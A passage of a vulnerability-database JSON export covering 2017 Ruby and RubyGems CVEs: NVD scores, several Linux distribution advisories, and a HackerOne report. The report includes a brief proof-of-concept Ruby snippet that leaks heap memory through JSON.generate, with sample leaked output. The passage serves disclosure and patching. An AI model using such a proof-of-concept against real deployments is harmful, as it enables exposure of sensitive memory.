"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-31T20:29:00", "title": "CVE-2017-0899", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0899"], "modified": "2019-10-09T23:21:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:redhat:enterprise_linux_server_eus:7.4", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:redhat:enterprise_linux_server_tus:7.4", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_server_aus:7.4", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/a:rubygems:rubygems:2.6.12", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-0899", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0899", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:rubygems:rubygems:2.6.12:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:31", "description": "Ruby before 2.4.2, 2.3.5, and 2.2.8 is vulnerable to a malicious format string which contains a precious specifier (*) with a huge minus value. Such situation can lead to a buffer overrun, resulting in a heap memory corruption or an information disclosure from the heap.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2017-09-15T19:29:00", "title": "CVE-2017-0898", "type": "cve", "cwe": ["CWE-134"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0898"], "modified": "2018-07-15T01:29:00", "cpe": ["cpe:/a:ruby-lang:ruby:2.3.0", "cpe:/a:ruby-lang:ruby:2.4.1", "cpe:/a:ruby-lang:ruby:2.2.5", "cpe:/a:ruby-lang:ruby:2.3.1", "cpe:/a:ruby-lang:ruby:2.4.0", "cpe:/a:ruby-lang:ruby:2.2.3", "cpe:/a:ruby-lang:ruby:2.3.4", "cpe:/a:ruby-lang:ruby:2.3.2", "cpe:/a:ruby-lang:ruby:2.2.1", "cpe:/a:ruby-lang:ruby:2.2.4", "cpe:/a:ruby-lang:ruby:2.2.0", "cpe:/a:ruby-lang:ruby:2.2.7", "cpe:/a:ruby-lang:ruby:2.2.2", "cpe:/a:ruby-lang:ruby:2.2.6", "cpe:/a:ruby-lang:ruby:2.3.3"], "id": "CVE-2017-0898", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0898", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:2.2.5:*:*:*:*:*:*:*"]}], "freebsd": [{"lastseen": "2019-05-29T18:32:11", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064"], "description": "\nRuby blog:\n\nCVE-2017-0898: Buffer underrun vulnerability in Kernel.sprintf\nIf a malicious format string which contains a precious specifier (*)\n\t is passed and a huge minus value is also passed to the specifier,\n\t buffer underrun may be caused. In such situation, the result may\n\t contains heap, or the Ruby interpreter may crash.\nCVE-2017-10784: Escape sequence injection vulnerability in the Basic\n\t authentication of WEBrick\nWhen using the Basic authentication of WEBrick, clients can pass an\n\t arbitrary string as the user name. WEBrick outputs the passed user name\n\t intact to its log, then an attacker can inject malicious escape\n\t sequences to the log and dangerous control characters may be executed\n\t on a victim\u00e2\u0080\u0099s terminal emulator.\nThis vulnerability is similar to a vulnerability already fixed, but\n\t it had not been fixed in the Basic authentication.\nCVE-2017-14033: Buffer underrun vulnerability in OpenSSL ASN1 decode\nIf a malicious string is passed to the decode method of OpenSSL::ASN1,\n\t buffer underrun may be caused and the Ruby interpreter may crash.\nCVE-2017-14064: Heap exposure vulnerability in generating JSON\nThe generate method of JSON module optionally accepts an instance of\n\t JSON::Ext::Generator::State class. If a malicious instance is passed,\n\t the result may include contents of heap.\n\n", "edition": 5, "modified": "2017-09-14T00:00:00", "published": "2017-09-14T00:00:00", "id": "95B01379-9D52-11E7-A25C-471BAFC3262F", "href": "https://vuxml.freebsd.org/freebsd/95b01379-9d52-11e7-a25c-471bafc3262f.html", "title": "ruby -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:08", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902", "CVE-2017-0903", "CVE-2017-10784", "CVE-2017-14064"], "description": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.\n\nThe following packages have been upgraded to a later upstream version: rh-ruby24-ruby (2.4.2). (BZ#1506785)\n\nSecurity Fix(es):\n\n* A buffer underflow was found in ruby's sprintf function. An attacker, with ability to control its format string parameter, could send a specially crafted string that would disclose heap memory or crash the interpreter. (CVE-2017-0898)\n\n* It was found that rubygems did not sanitize gem names during installation of a given gem. A specially crafted gem could use this flaw to install files outside of the regular directory. (CVE-2017-0901)\n\n* A vulnerability was found where rubygems did not sanitize DNS responses when requesting the hostname of the rubygems server for a domain, via a _rubygems._tcp DNS SRV query. An attacker with the ability to manipulate DNS responses could direct the gem command towards a different domain. (CVE-2017-0902)\n\n* A vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\n\n* It was found that WEBrick did not sanitize all its log messages. If logs were printed in a terminal, an attacker could interact with the terminal via the use of escape sequences. (CVE-2017-10784)\n\n* A vulnerability was found where rubygems did not properly sanitize gems' specification text. A specially crafted gem could interact with the terminal via the use of escape sequences. (CVE-2017-0899)\n\n* It was found that rubygems could use an excessive amount of CPU while parsing a sufficiently long gem summary. A specially crafted gem from a gem repository could freeze gem commands attempting to parse its summary. (CVE-2017-0900)\n\n* A buffer overflow vulnerability was found in the JSON extension of ruby. An attacker with the ability to pass a specially crafted JSON input to the extension could use this flaw to expose the interpreter's heap memory. (CVE-2017-14064)", "modified": "2018-06-13T01:28:23", "published": "2017-12-19T13:13:07", "id": "RHSA-2017:3485", "href": "https://access.redhat.com/errata/RHSA-2017:3485", "type": "redhat", "title": "(RHSA-2017:3485) Moderate: rh-ruby24-ruby security, bug fix, and enhancement update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:47", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902", "CVE-2017-0903", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-17405", "CVE-2017-17790"], "description": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.\n\nThe following packages have been upgraded to a later upstream version: rh-ruby23-ruby (2.3.6), rh-ruby23-rubygems (2.5.2.2), rh-ruby23-rubygem-json (1.8.3.1), rh-ruby23-rubygem-minitest (5.8.5), rh-ruby23-rubygem-psych (2.1.0.1). (BZ#1549649)\n\nSecurity Fix(es):\n\n* ruby: Command injection vulnerability in Net::FTP (CVE-2017-17405)\n\n* ruby: Buffer underrun vulnerability in Kernel.sprintf (CVE-2017-0898)\n\n* rubygems: Arbitrary file overwrite due to incorrect validation of specification name (CVE-2017-0901)\n\n* rubygems: DNS hijacking vulnerability (CVE-2017-0902)\n\n* rubygems: Unsafe object deserialization through YAML formatted gem specifications (CVE-2017-0903)\n\n* ruby: Escape sequence injection vulnerability in the Basic authentication of WEBrick (CVE-2017-10784)\n\n* ruby: Buffer underrun in OpenSSL ASN1 decode (CVE-2017-14033)\n\n* rubygems: Escape sequence in the \"summary\" field of gemspec (CVE-2017-0899)\n\n* rubygems: No size limit in summary length of gem spec (CVE-2017-0900)\n\n* ruby: Arbitrary heap exposure during a JSON.generate call (CVE-2017-14064)\n\n* ruby: Command injection in lib/resolv.rb:lazy_initialize() allows arbitrary code execution (CVE-2017-17790)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2018-06-13T01:28:24", "published": "2018-03-26T13:13:23", "id": "RHSA-2018:0585", "href": "https://access.redhat.com/errata/RHSA-2018:0585", "type": "redhat", "title": "(RHSA-2018:0585) Important: rh-ruby23-ruby security, bug fix, and enhancement update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:50", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902", "CVE-2017-0903", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-17405", "CVE-2017-17790"], "description": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.\n\nSecurity Fix(es):\n\n* It was discovered that the Net::FTP module did not properly process filenames in combination with certain operations. A remote attacker could exploit this flaw to execute arbitrary commands by setting up a malicious FTP server and tricking a user or Ruby application into downloading files with specially crafted names using the Net::FTP module. (CVE-2017-17405)\n\n* A buffer underflow was found in ruby's sprintf function. An attacker, with ability to control its format string parameter, could send a specially crafted string that would disclose heap memory or crash the interpreter. (CVE-2017-0898)\n\n* It was found that rubygems did not sanitize gem names during installation of a given gem. A specially crafted gem could use this flaw to install files outside of the regular directory. (CVE-2017-0901)\n\n* A vulnerability was found where rubygems did not sanitize DNS responses when requesting the hostname of the rubygems server for a domain, via a _rubygems._tcp DNS SRV query. An attacker with the ability to manipulate DNS responses could direct the gem command towards a different domain. (CVE-2017-0902)\n\n* A vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\n\n* It was found that WEBrick did not sanitize all its log messages. If logs were printed in a terminal, an attacker could interact with the terminal via the use of escape sequences. (CVE-2017-10784)\n\n* It was found that the decode method of the OpenSSL::ASN1 module was vulnerable to buffer underrun. An attacker could pass a specially crafted string to the application in order to crash the ruby interpreter, causing a denial of service. (CVE-2017-14033)\n\n* A vulnerability was found where rubygems did not properly sanitize gems' specification text. A specially crafted gem could interact with the terminal via the use of escape sequences. (CVE-2017-0899)\n\n* It was found that rubygems could use an excessive amount of CPU while parsing a sufficiently long gem summary. A specially crafted gem from a gem repository could freeze gem commands attempting to parse its summary. (CVE-2017-0900)\n\n* A buffer overflow vulnerability was found in the JSON extension of ruby. An attacker with the ability to pass a specially crafted JSON input to the extension could use this flaw to expose the interpreter's heap memory. (CVE-2017-14064)\n\n* The \"lazy_initialize\" function in lib/resolv.rb did not properly process certain filenames. A remote attacker could possibly exploit this flaw to inject and execute arbitrary commands. (CVE-2017-17790)", "modified": "2018-04-12T03:32:45", "published": "2018-02-28T21:24:33", "id": "RHSA-2018:0378", "href": "https://access.redhat.com/errata/RHSA-2018:0378", "type": "redhat", "title": "(RHSA-2018:0378) Important: ruby security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:19", "bulletinFamily": "unix", "cvelist": ["CVE-2009-5147", "CVE-2015-7551", "CVE-2017-0898", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902", "CVE-2017-0903", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-17405", "CVE-2017-17790"], "description": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.\n\nThe following packages have been upgraded to a later upstream version: rh-ruby22-ruby (2.2.9), rh-ruby22-rubygems (2.4.5.4), rh-ruby22-rubygem-psych (2.0.8.1), rh-ruby22-rubygem-json (1.8.1.1). (BZ#1549646)\n\nSecurity Fix(es):\n\n* ruby: Command injection vulnerability in Net::FTP (CVE-2017-17405)\n\n* ruby: Buffer underrun vulnerability in Kernel.sprintf (CVE-2017-0898)\n\n* rubygems: Arbitrary file overwrite due to incorrect validation of specification name (CVE-2017-0901)\n\n* rubygems: DNS hijacking vulnerability (CVE-2017-0902)\n\n* rubygems: Unsafe object deserialization through YAML formatted gem specifications (CVE-2017-0903)\n\n* ruby: Escape sequence injection vulnerability in the Basic authentication of WEBrick (CVE-2017-10784)\n\n* ruby: Buffer underrun in OpenSSL ASN1 decode (CVE-2017-14033)\n\n* ruby: DL::dlopen could open a library with tainted library name (CVE-2009-5147, CVE-2015-7551)\n\n* rubygems: Escape sequence in the \"summary\" field of gemspec (CVE-2017-0899)\n\n* rubygems: No size limit in summary length of gem spec (CVE-2017-0900)\n\n* ruby: Arbitrary heap exposure during a JSON.generate call (CVE-2017-14064)\n\n* ruby: Command injection in lib/resolv.rb:lazy_initialize() allows arbitrary code execution (CVE-2017-17790)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2018-06-13T01:28:16", "published": "2018-03-26T13:12:14", "id": "RHSA-2018:0583", "href": "https://access.redhat.com/errata/RHSA-2018:0583", "type": "redhat", "title": "(RHSA-2018:0583) Important: rh-ruby22-ruby security, bug fix, and enhancement update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2020-12-08T03:38:53", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "description": "**CentOS Errata and Security Advisory** CESA-2018:0378\n\n\nRuby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.\n\nSecurity Fix(es):\n\n* It was discovered that the Net::FTP module did not properly process filenames in combination with certain operations. A remote attacker could exploit this flaw to execute arbitrary commands by setting up a malicious FTP server and tricking a user or Ruby application into downloading files with specially crafted names using the Net::FTP module. (CVE-2017-17405)\n\n* A buffer underflow was found in ruby's sprintf function. An attacker, with ability to control its format string parameter, could send a specially crafted string that would disclose heap memory or crash the interpreter. (CVE-2017-0898)\n\n* It was found that rubygems did not sanitize gem names during installation of a given gem. A specially crafted gem could use this flaw to install files outside of the regular directory. (CVE-2017-0901)\n\n* A vulnerability was found where rubygems did not sanitize DNS responses when requesting the hostname of the rubygems server for a domain, via a _rubygems._tcp DNS SRV query. An attacker with the ability to manipulate DNS responses could direct the gem command towards a different domain. (CVE-2017-0902)\n\n* A vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter. (CVE-2017-0903)\n\n* It was found that WEBrick did not sanitize all its log messages. If logs were printed in a terminal, an attacker could interact with the terminal via the use of escape sequences. (CVE-2017-10784)\n\n* It was found that the decode method of the OpenSSL::ASN1 module was vulnerable to buffer underrun. An attacker could pass a specially crafted string to the application in order to crash the ruby interpreter, causing a denial of service. (CVE-2017-14033)\n\n* A vulnerability was found where rubygems did not properly sanitize gems' specification text. A specially crafted gem could interact with the terminal via the use of escape sequences. (CVE-2017-0899)\n\n* It was found that rubygems could use an excessive amount of CPU while parsing a sufficiently long gem summary. A specially crafted gem from a gem repository could freeze gem commands attempting to parse its summary. (CVE-2017-0900)\n\n* A buffer overflow vulnerability was found in the JSON extension of ruby. An attacker with the ability to pass a specially crafted JSON input to the extension could use this flaw to expose the interpreter's heap memory. (CVE-2017-14064)\n\n* The \"lazy_initialize\" function in lib/resolv.rb did not properly process certain filenames. A remote attacker could possibly exploit this flaw to inject and execute arbitrary commands. (CVE-2017-17790)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2018-March/034829.html\n\n**Affected packages:**\nruby\nruby-devel\nruby-doc\nruby-irb\nruby-libs\nruby-tcltk\nrubygem-bigdecimal\nrubygem-io-console\nrubygem-json\nrubygem-minitest\nrubygem-psych\nrubygem-rake\nrubygem-rdoc\nrubygems\nrubygems-devel\n\n**Upstream details at:**\n", "edition": 4, "modified": "2018-03-10T11:53:01", "published": "2018-03-10T11:53:01", "href": "http://lists.centos.org/pipermail/centos-announce/2018-March/034829.html", "id": "CESA-2018:0378", "type": "centos", "title": "ruby, rubygem, rubygems security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2020-10-22T17:10:58", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "description": "[2.0.0.648-33]\n- Fix always passing WEBrick test.\n[2.0.0.648-32]\n- Add Psych.safe_load\n * ruby-2.1.0-there-should-be-only-one-exception.patch\n * ruby-2.1.0-Adding-Psych.safe_load.patch\n Related: CVE-2017-0903\n- Disable Tokyo TZ tests broken by recen tzdata update.\n * ruby-2.5.0-Disable-Tokyo-TZ-tests.patch\n Related: CVE-2017-0903\n[2.0.0.648-31]\n- Fix unsafe object deserialization in RubyGems (CVE-2017-0903).\n * ruby-2.4.3-CVE-2017-0903-Fix-unsafe-object-deserialization\n -vulnerability.patch\n Resolves: CVE-2017-0903\n- Fix an ANSI escape sequence vulnerability (CVE-2017-0899).\n Resolves: CVE-2017-0899\n- Fix a DOS vulernerability in the query command (CVE-2017-0900).\n Resolves: CVE-2017-0900\n- Fix a vulnerability in the gem installer that allowed a malicious gem\n to overwrite arbitrary files (CVE-2017-0901).\n Resolves: CVE-2017-0901\n- Fix a DNS request hijacking vulnerability (CVE-2017-0902).\n * ruby-2.2.8-lib-rubygems-fix-several-vulnerabilities-in-RubyGems.patch\n Resolves: CVE-2017-0902\n- Fix buffer underrun vulnerability in Kernel.sprintf (CVE-2017-0898).\n * ruby-2.2.8-Buffer-underrun-vulnerability-in-Kernel.sprintf.patch\n Resolves: CVE-2017-0898\n- Escape sequence injection vulnerability in the Basic\n authentication of WEBrick (CVE-2017-10784).\n * ruby-2.2.8-sanitize-any-type-of-logs.patch\n Resolves: CVE-2017-10784\n- Arbitrary heap exposure during a JSON.generate call (CVE-2017-14064).\n * ruby-2.2.8-Fix-arbitrary-heap-exposure-during-a-JSON.generate-call.patch\n Resolves: CVE-2017-14064\n- Command injection vulnerability in Net::FTP (CVE-2017-17405).\n * ruby-2.2.9-Fix-a-command-injection-vulnerability-in-Net-FTP.patch\n Resolves: CVE-2017-17405\n- Buffer underrun in OpenSSL ASN1 decode (CVE-2017-14033).\n * ruby-2.2.8-asn1-fix-out-of-bounds-read-in-decoding-constructed-objects.patch\n Resolves: CVE-2017-14033\n- Command injection in lib/resolv.rb:lazy_initialize() allows arbitrary code\n execution(CVE-2017-17790).\n * ruby-2.5.0-Fixed-command-Injection.patch\n Resolves: CVE-2017-17790", "edition": 5, "modified": "2018-02-28T00:00:00", "published": "2018-02-28T00:00:00", "id": "ELSA-2018-0378", "href": "http://linux.oracle.com/errata/ELSA-2018-0378.html", "title": "ruby security update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2017-10-18T08:47:07", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2016-2337", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064"], "description": "### Background\n\nRuby is an interpreted object-oriented programming language. The elaborate standard library includes an HTTP server (\u201cWEBRick\u201d) and a class for XML parsing (\u201cREXML\u201d). \n\n### Description\n\nMultiple vulnerabilities have been discovered in Ruby. Please review the referenced CVE identifiers for details. \n\n### Impact\n\nA remote attacker could execute arbitrary code, cause a Denial of Service condition, or obtain sensitive information. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Ruby users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/ruby-2.2.8\"", "edition": 1, "modified": "2017-10-18T00:00:00", "published": "2017-10-18T00:00:00", "href": "https://security.gentoo.org/glsa/201710-18", "id": "GLSA-201710-18", "type": "gentoo", "title": "Ruby: Multiple vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-08T16:16:38", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0900", "CVE-2017-0899", "CVE-2017-0902", "CVE-2017-0901"], "description": "### Background\n\nRubyGems is a sophisticated package manager for Ruby.\n\n### Description\n\nMultiple vulnerabilities have been discovered in RubyGems. Please review the referenced CVE identifiers for details. \n\n### Impact\n\nA remote attacker, by enticing a user to install a specially crafted gem, could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll RubyGems users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-ruby/rubygems-2.6.13\"", "edition": 1, "modified": "2017-10-08T00:00:00", "published": "2017-10-08T00:00:00", "href": "https://security.gentoo.org/glsa/201710-01", "id": "GLSA-201710-01", "title": "RubyGems: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-10784", "CVE-2017-14033"], "description": "Ruby is the interpreted scripting language for quick and easy object-oriented programming. It has many features to process text files and to do system management tasks (as in Perl). It is simple, straight-forward, and extensible. ", "modified": "2017-12-26T16:32:32", "published": "2017-12-26T16:32:32", "id": "FEDORA:E680D6015E29", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: ruby-2.4.2-84.fc26", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-10784", "CVE-2017-14033"], "description": "Ruby is the interpreted scripting language for quick and easy object-oriented programming. It has many features to process text files and to do system management tasks (as in Perl). It is simple, straight-forward, and extensible. ", "modified": "2017-10-02T14:27:35", "published": "2017-10-02T14:27:35", "id": "FEDORA:605EC60A618F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: ruby-2.4.2-84.fc27", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902", "CVE-2017-14064"], "description": "Ruby is the interpreted scripting language for quick and easy object-oriented programming. It has many features to process text files and to do system management tasks (as in Perl). It is simple, straight-forward, and extensible. ", "modified": "2017-09-16T03:24:34", "published": "2017-09-16T03:24:34", "id": "FEDORA:EB90F61CDEB4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: ruby-2.3.4-64.fc25", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902"], "description": "RubyGems is the Ruby standard for publishing and managing third party libraries. ", "modified": "2017-09-09T23:57:10", "published": "2017-09-09T23:57:10", "id": "FEDORA:2FE52602F595", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: rubygems-2.6.13-100.fc26", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902"], "description": "RubyGems is the Ruby standard for publishing and managing third party libraries. ", "modified": "2017-09-30T07:26:40", "published": "2017-09-30T07:26:40", "id": "FEDORA:16FA760E0F1F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: rubygems-2.6.13-100.fc27", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2018-08-31T00:39:13", "bulletinFamily": "bugbounty", "bounty": 500.0, "cvelist": ["CVE-2017-14064"], "description": "Running this snippet can expose arbitrary memory:\n```ruby\nrequire 'json'\n\nstate = JSON.state.new\nstate.space = \"\\0\" * 1024\n\nputs JSON.generate({a: :b}, state)\n```\n\n```\n{\"a\":\npsych/handlers/recorder.rb\ntensi0\nreeze)\nGem::Specification.new do |s|\n # to objects of the same type as the original delegate.\nmydata/scm/git/ruby/dist/lib/ruby/2.5.0/json/ext.rb\npass the namP\nSee http://guides.rubygems.org/specification-reference/ for help\n# # constant and class member data initialization...\n\"b\"}\n```\n\n\nThe issues lies in using `strdup` in [generator.c](https://github.com/ruby/ruby/blob/trunk/ext/json/generator/generator.c#L1103), which will stop after encountering a NULL byte returning a pointer to zero length string, which is not the length stored in `space_len`. Eventually `fbuffer_append` will copy the length of the string (e.g. the 1024 above) into the generated buffer.\n\nSimpler snippets like `JSON.generate({foo: \"bar\"}, space: \"\\0\" * 1024` suffer the same issue but for slightly different reason; as `fstrndup` is using [memccpy](https://github.com/ruby/ruby/blob/trunk/ext/json/generator/generator.c#L311) which will, again, stop 